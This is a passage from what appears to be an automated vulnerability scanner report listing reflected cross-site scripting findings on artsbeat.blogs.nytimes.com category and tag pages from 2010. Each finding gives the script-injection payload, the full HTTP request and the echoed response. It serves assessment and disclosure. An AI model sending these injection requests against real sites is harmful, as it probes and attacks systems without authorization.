<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/dancead0f7\"><script>alert(1)</script>7745ad10317&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.43. http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/featured/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4f4"><script>alert(1)</script>618049fbd12 was submitted in the REST URL parameter 2. This input was echoed as 8e4f4\"><script>alert(1)</script>618049fbd12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/featured8e4f4"><script>alert(1)</script>618049fbd12/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:30 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/featured8e4f4\"><script>alert(1)</script>618049fbd12&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.44. http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/movies/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d062"><script>alert(1)</script>621d42481fe was submitted in the REST URL parameter 2. This input was echoed as 8d062\"><script>alert(1)</script>621d42481fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/movies8d062"><script>alert(1)</script>621d42481fe/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:06 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/movies8d062\"><script>alert(1)</script>621d42481fe&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.45. http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/music/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0781"><script>alert(1)</script>63dd7b81cef was submitted in the REST URL parameter 2. This input was echoed as f0781\"><script>alert(1)</script>63dd7b81cef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/musicf0781"><script>alert(1)</script>63dd7b81cef/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:16 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/musicf0781\"><script>alert(1)</script>63dd7b81cef&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.46. http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/new-york-city/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78201"><script>alert(1)</script>9bba86db8b1 was submitted in the REST URL parameter 2. This input was echoed as 78201\"><script>alert(1)</script>9bba86db8b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/new-york-city78201"><script>alert(1)</script>9bba86db8b1/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/new-york-city78201\"><script>alert(1)</script>9bba86db8b1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.47. http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/television/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca6e"><script>alert(1)</script>e1cf7713b07 was submitted in the REST URL parameter 2. This input was echoed as 6ca6e\"><script>alert(1)</script>e1cf7713b07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/television6ca6e"><script>alert(1)</script>e1cf7713b07/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:20 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/television6ca6e\"><script>alert(1)</script>e1cf7713b07&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.48. http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /category/theater/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8370"><script>alert(1)</script>08e1b6da719 was submitted in the REST URL parameter 2. This input was echoed as f8370\"><script>alert(1)</script>08e1b6da719 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/theaterf8370"><script>alert(1)</script>08e1b6da719/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:22 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/theaterf8370\"><script>alert(1)</script>08e1b6da719&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.49. http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/amc/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43f1c"><script>alert(1)</script>41d4afcb6d4 was submitted in the REST URL parameter 2. This input was echoed as 43f1c\"><script>alert(1)</script>41d4afcb6d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/amc43f1c"><script>alert(1)</script>41d4afcb6d4/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58215
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/amc43f1c\"><script>alert(1)</script>41d4afcb6d4&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.50. http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/anatomy-of-a-scene/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e99"><script>alert(1)</script>6201528606d was submitted in the REST URL parameter 2. This input was echoed as e7e99\"><script>alert(1)</script>6201528606d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/anatomy-of-a-scenee7e99"><script>alert(1)</script>6201528606d/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:14 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/anatomy-of-a-scenee7e99\"><script>alert(1)</script>6201528606d&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.51. http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/chris-pine/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef3a"><script>alert(1)</script>8b298f2fb19 was submitted in the REST URL parameter 2. This input was echoed as 4ef3a\"><script>alert(1)</script>8b298f2fb19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/chris-pine4ef3a"><script>alert(1)</script>8b298f2fb19/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/chris-pine4ef3a\"><script>alert(1)</script>8b298f2fb19&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.52. http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/denzel-washington/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bb6"><script>alert(1)</script>38050bcc525 was submitted in the REST URL parameter 2. This input was echoed as 69bb6\"><script>alert(1)</script>38050bcc525 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/denzel-washington69bb6"><script>alert(1)</script>38050bcc525/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/denzel-washington69bb6\"><script>alert(1)</script>38050bcc525&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.53. http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/hip-hop/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7b7"><script>alert(1)</script>58c4fa3e928 was submitted in the REST URL parameter 2. This input was echoed as 1e7b7\"><script>alert(1)</script>58c4fa3e928 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/hip-hop1e7b7"><script>alert(1)</script>58c4fa3e928/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/hip-hop1e7b7\"><script>alert(1)</script>58c4fa3e928&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.54. http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/james-levine/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71b07"><script>alert(1)</script>db7048b06c8 was submitted in the REST URL parameter 2. This input was echoed as 71b07\"><script>alert(1)</script>db7048b06c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/james-levine71b07"><script>alert(1)</script>db7048b06c8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/james-levine71b07\"><script>alert(1)</script>db7048b06c8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.55. http://artsbeat.blogs.nytimes.com/tag/kanye-west/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/kanye-west/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14892"><script>alert(1)</script>f62c755879a was submitted in the REST URL parameter 2. This input was echoed as 14892\"><script>alert(1)</script>f62c755879a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/kanye-west14892"><script>alert(1)</script>f62c755879a/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/kanye-west14892\"><script>alert(1)</script>f62c755879a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.56. http://artsbeat.blogs.nytimes.com/tag/matt-lauer/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/matt-lauer/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a44"><script>alert(1)</script>7a33a3a08b8 was submitted in the REST URL parameter 2. This input was echoed as d3a44\"><script>alert(1)</script>7a33a3a08b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/matt-lauerd3a44"><script>alert(1)</script>7a33a3a08b8/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/matt-lauerd3a44\"><script>alert(1)</script>7a33a3a08b8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.57. http://artsbeat.blogs.nytimes.com/tag/metropolitan-opera/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://artsbeat.blogs.nytimes.com
Path: /tag/metropolitan-opera/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72636"><script>alert(1)</script>fe25915fda2 was submitted in the REST URL parameter 2. This input was echoed as 72636\"><script>alert(1)</script>fe25915fda2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/metropolitan-opera72636"><script>alert(1)</script>fe25915fda2/ HTTP/1.1
Host: artsbeat.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:56:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 01:56:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
